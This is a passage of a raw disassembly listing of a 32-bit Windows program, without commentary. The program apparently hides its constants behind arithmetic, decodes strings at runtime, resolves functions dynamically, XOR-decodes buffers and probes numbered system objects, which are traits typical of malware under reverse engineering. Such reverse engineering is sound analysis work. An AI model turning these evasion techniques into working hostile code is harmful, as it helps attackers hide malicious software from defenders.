sub_422EEA endp
; =============== S U B R O U T I N E =======================================
sub_4230AA proc near ; CODE XREF: .data:0041A7D6�p
push edi
push 10014C79h
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10010598h
mov ds:10014274h, eax
test eax, eax
jnz short loc_4230DD
push 10014C6Ah
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10011208h
mov ds:10014274h, eax
loc_4230DD: ; CODE XREF: sub_4230AA+1A�j
push 10014C56h
call sub_41B08F
pop ecx
push eax
push dword ptr ds:10014274h
call dword ptr ds:100101ACh
mov ds:10010A00h, eax
pop edi
retn
sub_4230AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4230FC proc near ; CODE XREF: sub_41C00F+1C2�p
; sub_421545+1F7�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword ptr ds:10014250h, 0
jnz short loc_423124
push 10013DA0h
call dword ptr ds:1000EFB8h
mov dword ptr ds:10014250h, 1
loc_423124: ; CODE XREF: sub_4230FC+11�j
mov esi, ds:10014154h
add esi, 3
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+2]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
mov edx, ds:10014214h
add edx, ds:10014094h
dec edx
imul ebx, edx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, ds:1001424Ch
movsx ecx, word ptr ds:100141B8h
add edx, ecx
sub edx, 8
cmp eax, edx
jz loc_4231FA
push 10013DA0h
call dword ptr ds:1001383Ch
mov eax, ds:1001420Ch
dec eax
mov [ebp+var_2], ax
jmp short loc_4231AF
; ---------------------------------------------------------------------------
loc_42318A: ; CODE XREF: sub_4230FC+BD�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+4]
xor edx, ecx
mov [eax], dl
movzx eax, [ebp+var_2]
movsx edx, word ptr ds:100140C4h
sub edx, 7
add eax, edx
mov [ebp+var_2], ax
loc_4231AF: ; CODE XREF: sub_4230FC+8C�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_42318A
mov eax, ds:100141F8h
add eax, ds:10014230h
sub eax, 0Dh
mov edx, ds:10014188h
sub edx, 9
mov [edi+eax], dl
movsx eax, word ptr ds:100140B8h
sub eax, 7
mov edx, ds:100140F0h
add edx, ds:100141E0h
dec edx
mov [edi+eax], dl
push 10013DA0h
call dword ptr ds:10012824h
loc_4231FA: ; CODE XREF: sub_4230FC+71�j
lea eax, [edi+6]
pop edi
pop esi
pop ebx
leave
retn
sub_4230FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423202 proc near ; CODE XREF: sub_4229B3+1BA�p
; sub_4229B3+1DB�p
var_4F = byte ptr -4Fh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call dword ptr ds:10013950h
mov [ebp+var_8], eax
mov eax, ds:100141E0h
mov esi, eax
add esi, ds:100141C8h
sub esi, 3
jmp short loc_42325F
; ---------------------------------------------------------------------------
loc_423229: ; CODE XREF: sub_423202+74�j
cmp dword ptr ds:1000F0E0h[esi*4], 0
jz short loc_42325E
mov edx, ds:10012830h[esi*4]
mov ecx, ds:10014240h
add ecx, 0EA60h
mov eax, ds:100141ECh
dec eax
imul ecx, eax
add edx, ecx
cmp edx, [ebp+var_8]
jnb short loc_42325E
and dword ptr ds:1000F0E0h[esi*4], 0
loc_42325E: ; CODE XREF: sub_423202+2F�j
; sub_423202+52�j
inc esi
loc_42325F: ; CODE XREF: sub_423202+25�j
movsx eax, word ptr ds:10014160h
movsx edx, word ptr ds:100140B8h
lea eax, [eax+edx+3D9h]
cmp esi, eax
jb short loc_423229
loc_423278: ; CODE XREF: sub_423202+97�j
; sub_423202+26B�j
mov eax, [ebx]
mov [ebp+var_14], eax
lea ebx, [ebx+eax]
mov eax, ebx
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb loc_423473
mov eax, ds:10014094h
add eax, 2
cmp [ebp+var_14], eax
ja short loc_423278
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_4232A0: ; CODE XREF: sub_423202+A3�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4232A0
mov [ebp+var_10], eax
mov eax, ds:10014118h
mov edx, ebx
sub edx, [ebp+arg_0]
mov ecx, eax
add ecx, eax
mov eax, ecx
sub eax, 8
sub edx, eax
mov [ebp+var_C], edx
mov [ebp+var_1], 44h
mov eax, ds:10014104h
sub eax, 4
cmp byte ptr [ebx+eax], 2Ah
jnz short loc_4232D8
mov [ebp+var_1], 43h
loc_4232D8: ; CODE XREF: sub_423202+D0�j
mov eax, ds:100140DCh
mov edi, eax
add edi, ds:1001409Ch
dec edi
jmp short loc_42330F
; ---------------------------------------------------------------------------
loc_4232E8: ; CODE XREF: sub_423202+11F�j
cmp dword ptr ds:1000F0E0h[edi*4], 0
jz short loc_42330E
mov edx, [ebp+var_C]
cmp ds:1000E010h[edi*4], edx
jnz short loc_42330E
mov dl, ds:100101B0h[edi]
cmp dl, [ebp+var_1]
jz loc_423458
loc_42330E: ; CODE XREF: sub_423202+EE�j
; sub_423202+FA�j
inc edi
loc_42330F: ; CODE XREF: sub_423202+E4�j
mov eax, ds:1001414Ch
add eax, 3E0h
add eax, ds:10014240h
cmp edi, eax
jb short loc_4232E8
mov eax, ds:100140CCh
add eax, 3B1h
add eax, ds:10014244h
cmp [ebp+var_10], eax
jbe loc_423408
movsx eax, word ptr ds:10014090h
add eax, 0Ah
push eax
lea eax, [ebp+var_4F]
push eax
call sub_4240DE
add esp, 8
movsx eax, word ptr ds:100141C0h
add eax, 3B7h
mov [ebp+var_18], eax
movsx eax, word ptr ds:100140E4h
add eax, ds:100141CCh
sub eax, 3
mov [ebp+var_1C], eax
loc_423375: ; CODE XREF: sub_423202+201�j
mov eax, [ebp+var_18]
mov al, [ebx+eax]
mov [ebp+var_1D], al
mov eax, [ebp+var_18]
mov edx, ds:1001410Ch
add edx, ds:1001417Ch
sub edx, 9
mov [ebx+eax], dl
push 1000EFD0h
push [ebp+var_10]
push [ebp+var_1C]
lea eax, [ebp+var_4F]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov eax, ds:10014200h
movsx edx, word ptr ds:1001411Ch
add eax, edx
sub eax, 0Ah
and eax, 0FFh
push eax
call sub_41C00F
add esp, 24h
mov eax, [ebp+var_18]
mov dl, [ebp+var_1D]
mov [ebx+eax], dl
mov [ebp+var_1C], eax
movsx eax, word ptr ds:10014114h
mov edx, ds:1001424Ch
lea eax, [eax+edx+3AEh]
add [ebp+var_18], eax
mov eax, [ebp+var_10]
cmp [ebp+var_18], eax
jbe short loc_4233FB
mov [ebp+var_18], eax
loc_4233FB: ; CODE XREF: sub_423202+1F4�j
mov eax, [ebp+var_10]
cmp [ebp+var_1C], eax
jnb short loc_423453
jmp loc_423375
; ---------------------------------------------------------------------------
loc_423408: ; CODE XREF: sub_423202+134�j
push 10014C51h
call sub_41B08F
push 1000EFD0h
push [ebp+var_10]
movsx edx, word ptr ds:10014128h
sub edx, 5
push edx
push eax
mov edx, [ebp+arg_C]
push dword ptr [edx]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov edx, ds:10014238h
movsx ecx, word ptr ds:10014190h
add edx, ecx
sub edx, 0Eh
and edx, 0FFh
push edx
call sub_41C00F
add esp, 28h
loc_423453: ; CODE XREF: sub_423202+1FF�j
mov eax, [ebp+arg_C]
inc dword ptr [eax]
loc_423458: ; CODE XREF: sub_423202+106�j
mov eax, [ebp+var_10]
lea ebx, [ebx+eax]
inc ebx
mov eax, [ebp+arg_C]
mov edx, ds:10014208h
add edx, 0Eh
cmp [eax], edx
jbe loc_423278
loc_423473: ; CODE XREF: sub_423202+86�j
push 10014C4Dh
call sub_41B08F
push 1000EFD0h
mov edx, ds:100141C8h
mov ecx, ds:10014214h
add ecx, edx
sub ecx, 3
push ecx
movsx ecx, word ptr ds:10014120h
add ecx, ds:100140C0h
sub ecx, 0Dh
push ecx
push eax
add edx, ds:1001417Ch
sub edx, 0Bh
push edx
push 0
push 0
push [ebp+arg_8]
mov edx, ds:1001410Ch
movsx ecx, word ptr ds:100141F0h
add edx, ecx
dec edx
and edx, 0FFh
push edx
call sub_41C00F
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_423202 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4234DB proc near ; CODE XREF: .data:loc_41A7E7�p
; .data:00424DDD�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 108h
push esi
push edi
mov edi, ds:100141E0h
add edi, 4
jmp short loc_42356A
; ---------------------------------------------------------------------------
loc_4234F1: ; CODE XREF: sub_4234DB+9B�j
push 10014C41h
call sub_41B08F
mov [ebp+var_108], eax
push 10014C37h
call sub_41B08F
push edi
push eax
mov esi, [ebp+var_108]
push esi
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10013810h
add esp, 18h
lea eax, [ebp+var_FF]
push eax
push 0
push 100000h
call dword ptr ds:1001281Ch
mov [ebp+var_104], eax
or eax, eax
jz short loc_423569
push eax
call dword ptr ds:1001282Ch
movsx eax, word ptr ds:10014120h
add eax, ds:1001410Ch
sub eax, 4
cmp edi, eax
jnz short loc_423562
xor eax, eax
inc eax
jmp short loc_42357E
; ---------------------------------------------------------------------------
loc_423562: ; CODE XREF: sub_4234DB+80�j
mov eax, 2
jmp short loc_42357E
; ---------------------------------------------------------------------------
loc_423569: ; CODE XREF: sub_4234DB+65�j
inc edi
loc_42356A: ; CODE XREF: sub_4234DB+14�j
movsx eax, word ptr ds:100141C0h
add eax, 5Bh
cmp edi, eax
jb loc_4234F1
xor eax, eax
loc_42357E: ; CODE XREF: sub_4234DB+85�j
; sub_4234DB+8C�j
pop edi
pop esi
leave
retn
sub_4234DB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10013D8Ch
call dword ptr ds:100109F4h
mov eax, ds:10013D8Ch
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423599 proc near ; CODE XREF: sub_41E931+296�p
; sub_41EF87+3AC�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
inc esi
mov edi, ds:100141A8h
add edi, 11h
movsx ebx, word ptr ds:10014160h
add edi, ebx
mov eax, esi
test eax, eax
jge short loc_4235C3
add eax, 0FFh
loc_4235C3: ; CODE XREF: sub_423599+23�j
sar eax, 8
movsx ebx, word ptr ds:10014128h
mov ecx, ds:1001418Ch
lea ebx, [ebx+ecx+3]
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_8], edi
mov edi, ds:100141A0h
add edi, 13h
movsx ebx, word ptr ds:100140E4h
add edi, ebx
mov eax, esi
test eax, eax
jge short loc_4235FE
add eax, 0FFh
loc_4235FE: ; CODE XREF: sub_423599+5E�j
sar eax, 8
mov ebx, ds:10014230h
add ebx, 0Ah
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_C], edi
mov edi, ds:10014240h
add edi, 18h
add edi, ds:1001417Ch
mov eax, esi
test eax, eax
jge short loc_42362E
add eax, 0FFFFh
loc_42362E: ; CODE XREF: sub_423599+8E�j
sar eax, 10h
movsx ebx, word ptr ds:10014180h
add ebx, 12h
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_10], edi
mov eax, esi
mul [ebp+var_8]
mov [ebp+var_1C], eax
and eax, 0FFh
push eax
call sub_424763
mov ebx, eax
mov [ebp+var_1], bl
mov eax, ds:100141FCh
add eax, 8
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41E376
mov ebx, eax
mov [ebp+var_11], bl
mov eax, esi
mul [ebp+var_C]
mov [ebp+var_20], eax
and eax, 0FFh
push eax
call sub_424763
mov ebx, eax
mov [ebp+var_12], bl
mov eax, ds:1001409Ch
add eax, 6Ah
add eax, ds:10014200h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41E376
mov ebx, eax
mov [ebp+var_13], bl
mov eax, esi
and eax, 0FFh
push eax
call sub_424763
mov ebx, eax
mov [ebp+var_14], bl
movsx eax, word ptr ds:1001421Ch
mov edx, ds:1001424Ch
lea eax, [eax+edx+20h]
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41E376
mov ebx, eax
mov [ebp+var_15], bl
mov eax, esi
mul [ebp+var_10]
mov [ebp+var_24], eax
and eax, 0FFh
push eax
call sub_424763
mov ebx, eax
mov [ebp+var_16], bl
movsx eax, word ptr ds:100141F0h
add eax, 47h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41E376
mov ebx, eax
mov [ebp+var_17], bl
mov eax, ds:100140CCh
add eax, 3Bh
add eax, ds:10014094h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_424763
add esp, 24h
mov ebx, eax
mov [ebp+var_18], bl
movzx edi, [ebp+var_1]
mov eax, edi
shr eax, 1
movsx esi, word ptr ds:100140E8h
add esi, ds:100141D8h
sub esi, 5
mul esi
mov [ebp+var_28], eax
mov esi, eax
cmp esi, edi
jnz short loc_4237BD
push 10014C1Dh
call sub_41B08F
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call dword ptr ds:10013810h
add esp, 30h
jmp short loc_423801
; ---------------------------------------------------------------------------
loc_4237BD: ; CODE XREF: sub_423599+1DC�j
push 10014C02h
call sub_41B08F
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call dword ptr ds:10013810h
add esp, 30h
loc_423801: ; CODE XREF: sub_423599+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_423599 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423806 proc near ; CODE XREF: sub_41D579+24F�p
; sub_424EDB+2BD�p
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_316 = byte ptr -316h
var_212 = byte ptr -212h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 32Ch
push ebx
push esi
push edi
push [ebp+arg_4]
call dword ptr ds:1001380Ch
pop ecx
push [ebp+arg_0]
lea eax, [ebp+var_316]
push eax
call sub_425D7D
lea ecx, [ebp+var_316]
or eax, 0FFFFFFFFh
loc_423834: ; CODE XREF: sub_423806+33�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_423834
mov ebx, eax
sub ebx, ds:100141E4h
movsx edx, word ptr ds:100141C0h
add edx, ds:1001416Ch
sub edx, 0Bh
mov [ebp+ebx+var_316], dl
mov edi, ds:10014248h
loc_423860: ; CODE XREF: sub_423806+164�j
mov eax, edi
movsx ecx, word ptr ds:10014204h
movsx ebx, word ptr ds:100141F0h
add ecx, ebx
sub ecx, 6
mul ecx
mov [ebp+var_320], eax
movsx eax, [ebp+edi+var_316]
mov edx, [ebp+var_320]
mov [ebp+edx+var_212], al
mov eax, edi
mov ecx, ds:100140D4h
add ecx, 2
add ecx, ds:100140F0h
mul ecx
mov [ebp+var_324], eax
mov eax, ds:100141ACh
sub eax, 4
mov edx, [ebp+var_324]
add edx, eax
movsx eax, word ptr ds:10014164h
sub eax, 4
mov [ebp+edx+var_212], al
movsx eax, [ebp+edi+var_316]
mov edx, ds:100140BCh
movsx ecx, word ptr ds:100140A0h
add edx, ecx
sub edx, 3
cmp eax, edx
jnz short loc_423969
mov eax, edi
mov ecx, ds:10014178h
sub ecx, 3
mul ecx
mov [ebp+var_328], eax
mov eax, ds:100140D0h
add eax, ds:100141E4h
mov edx, [ebp+var_328]
add edx, eax
mov eax, ds:10014188h
sub eax, 9
mov [ebp+edx+var_212], al
mov eax, edi
movsx ecx, word ptr ds:10014190h
add ecx, ds:10014198h
sub ecx, 0Ch
mul ecx
mov [ebp+var_32C], eax
mov eax, ds:100140ECh
movsx edx, word ptr ds:10014128h
add eax, edx
sub eax, 8
mov edx, [ebp+var_32C]
add edx, eax
mov eax, ds:100141C4h
add eax, ds:10014224h
sub eax, 6
mov [ebp+edx+var_212], al
jmp short loc_42396F
; ---------------------------------------------------------------------------
loc_423969: ; CODE XREF: sub_423806+E2�j
inc edi
jmp loc_423860
; ---------------------------------------------------------------------------
loc_42396F: ; CODE XREF: sub_423806+161�j
cmp dword ptr ds:1001426Ch, 0
jz short loc_4239B2
lea eax, [ebp+var_212]
push eax
push 0
call dword ptr ds:100105B4h
mov esi, eax
or esi, esi
jz short loc_4239B2
cmp dword ptr ds:10014270h, 0
jz short loc_4239D3
movsx eax, word ptr ds:10014128h
sub eax, 4
neg eax
push eax
lea eax, [ebp+var_212]
push eax
push 0
call dword ptr ds:1000D020h
loc_4239B2: ; CODE XREF: sub_423806+170�j
; sub_423806+185�j
push dword ptr ds:100105C4h
push dword ptr ds:100137E0h
lea eax, [ebp+var_316]
push eax
call sub_41F8D9
add esp, 0Ch
mov [ebp+var_31C], eax
loc_4239D3: ; CODE XREF: sub_423806+18E�j
pop edi
pop esi
pop ebx
leave
retn
sub_423806 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4239D8 proc near ; CODE XREF: .data:0041EDEC�p
; sub_4229B3+1E�p ...
var_1008C = dword ptr -1008Ch
var_10088 = dword ptr -10088h
var_10084 = dword ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = dword ptr -1007Ch
var_10078 = word ptr -10078h
var_10070 = dword ptr -10070h
var_10064 = dword ptr -10064h
var_10060 = dword ptr -10060h
var_1005C = dword ptr -1005Ch
var_10055 = byte ptr -10055h
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10048 = dword ptr -10048h
var_10044 = dword ptr -10044h
var_1003F = byte ptr -1003Fh
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1008Ch
call sub_425D5D
push ebx
push esi
push edi
mov [ebp+var_40], 8
push 10014BF4h
call sub_4230FC
pop ecx
push eax
call dword ptr ds:1000DFF8h
mov [ebp+var_38], eax
lea eax, [ebp+var_2C]
push eax
lea esi, [ebp+var_40]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_4]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word ptr ds:1001423Ch
add eax, ds:10014140h
sub eax, 0Eh
cmp ebx, eax
jz short loc_423A3C
xor eax, eax
jmp loc_4240C2
; ---------------------------------------------------------------------------
loc_423A3C: ; CODE XREF: sub_4239D8+5B�j
lea eax, [ebp+var_24]
push eax
push 10015C54h
mov eax, [ebp+var_2C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10014130h
add eax, ds:10014108h
sub eax, 0Bh
cmp ebx, eax
jnz loc_4240B7
lea eax, [ebp+var_28]
push eax
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
movsx eax, word ptr ds:10014090h
sub eax, 5
cmp ebx, eax
jnz loc_4240AE
mov eax, ds:1001420Ch
add eax, ds:100141A0h
sub eax, 7
mov [ebp+var_1C], eax
jmp loc_4240A2
; ---------------------------------------------------------------------------
loc_423AA3: ; CODE XREF: sub_4239D8+6D0�j
mov [ebp+var_18], 2
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
lea eax, [ebp+var_4]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_24]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, ds:100141D0h
sub eax, 5
cmp ebx, eax
jnz loc_42409F
and [ebp+var_10044], 0
lea eax, [ebp+var_10044]
push eax
push 10015C64h
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100141D4h
sub eax, 5
cmp ebx, eax
jnz loc_42407B
cmp [ebp+var_10044], 0
jz loc_42407B
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10044]
push eax
mov edi, [eax]
call dword ptr [edi+0F8h]
mov ebx, eax
or ebx, ebx
jnz loc_42407B
lea eax, [ebp+var_1003F]
push eax
push [ebp+var_20]
call sub_41BCA3
mov eax, ds:100141E0h
add eax, ds:100141D8h
sub eax, 3
push eax
push 100111F0h
lea eax, [ebp+var_1003F]
push eax
call sub_4251A5
add esp, 14h
movsx edi, word ptr ds:1001412Ch
mov esi, ds:100140FCh
lea edi, [edi+esi+0FFF0h]
cmp eax, edi
jz loc_42407B
movsx eax, word ptr ds:1001423Ch
add eax, ds:100141BCh
sub eax, 7
cmp [ebp+arg_8], eax
jnz short loc_423BC8
mov eax, [ebp+var_10044]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
inc eax
jmp loc_4240C2
; ---------------------------------------------------------------------------
loc_423BC8: ; CODE XREF: sub_4239D8+1D1�j
mov eax, ds:100140D4h
add eax, 3
add eax, ds:10014248h
cmp [ebp+arg_8], eax
jnz short loc_423C0C
and [ebp+var_10088], 0
lea eax, [ebp+var_10088]
push eax
push 10015CA4h
mov eax, [ebp+var_10044]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
and [ebp+var_1008C], 0
jmp loc_42407B
; ---------------------------------------------------------------------------
loc_423C0C: ; CODE XREF: sub_4239D8+201�j
and [ebp+var_1007C], 0
lea eax, [ebp+var_1007C]
push eax
push 10015C84h
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10014234h
add eax, ds:100141D8h
sub eax, 6
cmp ebx, eax
jnz loc_42407B
mov [ebp+var_10055], 44h
push 10014BECh
call sub_41B08F
mov edi, ds:100141D0h
movsx esi, word ptr ds:100141DCh
add edi, esi
sub edi, 0Dh
push edi
push eax
lea edi, [ebp+var_1003F]
push edi
call sub_4251A5
add esp, 10h
mov esi, ds:100140E0h
add esi, 0FFFBh
add esi, ds:10014124h
cmp eax, esi
jz short loc_423C95
mov [ebp+var_10055], 43h
loc_423C95: ; CODE XREF: sub_4239D8+2B4�j
push 10014BE4h
call sub_41B08F
movsx edi, word ptr ds:100140B4h
add edi, ds:10014154h
sub edi, 6
push edi
push eax
lea edi, [ebp+var_1003F]
push edi
call sub_4251A5
add esp, 10h
movsx esi, word ptr ds:1001411Ch
mov edi, eax
add edi, esi
mov [ebp+var_10064], edi
mov [ebp+var_10050], edi
loc_423CD7: ; CODE XREF: sub_4239D8+315�j
mov eax, [ebp+var_10050]
cmp [ebp+eax+var_1003F], 26h
jz short loc_423CEF
inc [ebp+var_10050]
jmp short loc_423CD7
; ---------------------------------------------------------------------------
loc_423CEF: ; CODE XREF: sub_4239D8+30D�j
mov eax, [ebp+var_10050]
mov edx, ds:10014104h
add edx, ds:100141C4h
sub edx, 5
mov [ebp+eax+var_1003F], dl
mov eax, [ebp+var_10064]
lea eax, [ebp+eax+var_1003F]
push eax
call dword ptr ds:1000E008h
mov [ebp+var_10080], eax
push 10014BDDh
call sub_41B08F
push dword ptr ds:1001418Ch
push eax
lea edi, [ebp+var_1003F]
push edi
call sub_4251A5
add esp, 14h
mov esi, ds:10014154h
movsx edx, word ptr ds:10014144h
add esi, edx
sub esi, 9
mov edi, eax
add edi, esi
mov [ebp+var_10064], edi
mov [ebp+var_10050], edi
loc_423D67: ; CODE XREF: sub_4239D8+3A5�j
mov eax, [ebp+var_10050]
cmp [ebp+eax+var_1003F], 26h
jz short loc_423D7F
inc [ebp+var_10050]
jmp short loc_423D67
; ---------------------------------------------------------------------------
loc_423D7F: ; CODE XREF: sub_4239D8+39D�j
mov eax, [ebp+var_10050]
movsx edx, word ptr ds:10014190h
movsx ecx, word ptr ds:10014110h
add edx, ecx
sub edx, 5
mov [ebp+eax+var_1003F], dl
mov eax, [ebp+var_10064]
lea eax, [ebp+eax+var_1003F]
push eax
call dword ptr ds:1000E008h
pop ecx
mov [ebp+var_1005C], eax
mov eax, ds:10014214h
dec eax
cmp [ebp+var_10080], eax
ja short loc_423E28
mov eax, ds:1001415Ch
mov [ebp+var_10048], eax
jmp short loc_423E16
; ---------------------------------------------------------------------------
loc_423DD5: ; CODE XREF: sub_4239D8+44E�j
mov edi, [ebp+var_10048]
mov esi, edi
shl esi, 2
cmp dword ptr ds:1000F0E0h[esi], 0
jz short loc_423E10
mov edx, [ebp+var_1005C]
cmp ds:1000E010h[esi], edx
jnz short loc_423E10
mov dl, ds:100101B0h[edi]
cmp dl, [ebp+var_10055]
jnz short loc_423E10
and dword ptr ds:1000F0E0h[edi*4], 0
loc_423E10: ; CODE XREF: sub_4239D8+410�j
; sub_4239D8+41F�j ...
inc [ebp+var_10048]
loc_423E16: ; CODE XREF: sub_4239D8+3FB�j
mov eax, ds:1001419Ch
add eax, 3DFh
cmp [ebp+var_10048], eax
jb short loc_423DD5
loc_423E28: ; CODE XREF: sub_4239D8+3EE�j
call dword ptr ds:10013950h
mov [ebp+var_10060], eax
movsx eax, word ptr ds:10014180h
sub eax, 5
mov [ebp+var_1004C], eax
jmp short loc_423E98
; ---------------------------------------------------------------------------
loc_423E46: ; CODE XREF: sub_4239D8+4D0�j
mov edi, [ebp+var_1004C]
shl edi, 2
cmp dword ptr ds:1000F0E0h[edi], 0
jz short loc_423E92
mov edi, ds:10012830h[edi]
movsx esi, word ptr ds:100140B8h
add esi, 0EA57h
movsx edx, word ptr ds:100141F0h
add edx, 3
imul esi, edx
add edi, esi
cmp edi, [ebp+var_10060]
jnb short loc_423E92
mov edi, [ebp+var_1004C]
and dword ptr ds:1000F0E0h[edi*4], 0
loc_423E92: ; CODE XREF: sub_4239D8+47F�j
; sub_4239D8+4AA�j
inc [ebp+var_1004C]
loc_423E98: ; CODE XREF: sub_4239D8+46C�j
mov eax, ds:100140A4h
add eax, 3DFh
cmp [ebp+var_1004C], eax
jb short loc_423E46
mov eax, ds:10014170h
add eax, ds:1001424Ch
sub eax, 0Eh
mov [ebp+var_10054], eax
jmp short loc_423ED6
; ---------------------------------------------------------------------------
loc_423EC0: ; CODE XREF: sub_4239D8+50E�j
mov edi, [ebp+var_10054]
cmp dword ptr ds:1000F0E0h[edi*4], 0
jz short loc_423EE8
inc [ebp+var_10054]
loc_423ED6: ; CODE XREF: sub_4239D8+4E6�j
mov eax, ds:100140B0h
add eax, 3DFh
cmp [ebp+var_10054], eax
jb short loc_423EC0
loc_423EE8: ; CODE XREF: sub_4239D8+4F6�j
mov edi, [ebp+var_10054]
mov esi, [ebp+var_1005C]
mov ds:1000E010h[edi*4], esi
mov eax, edi
mov dl, [ebp+var_10055]
mov ds:100101B0h[eax], dl
mov esi, [ebp+arg_0]
mov ds:1000D050h[edi*4], esi
movsx eax, word ptr ds:100140F4h
sub eax, 7
cmp [ebp+var_10080], eax
jbe loc_423FCB
mov esi, ds:10014158h
add esi, 0FFEEh
movsx edx, word ptr ds:10014144h
add esi, edx
mov ds:10010A10h[edi*2], si
mov eax, ds:10014240h
mov [ebp+var_10088], eax
jmp short loc_423FB7
; ---------------------------------------------------------------------------
loc_423F54: ; CODE XREF: sub_4239D8+5EF�j
mov edi, [ebp+var_10088]
mov esi, edi
shl esi, 2
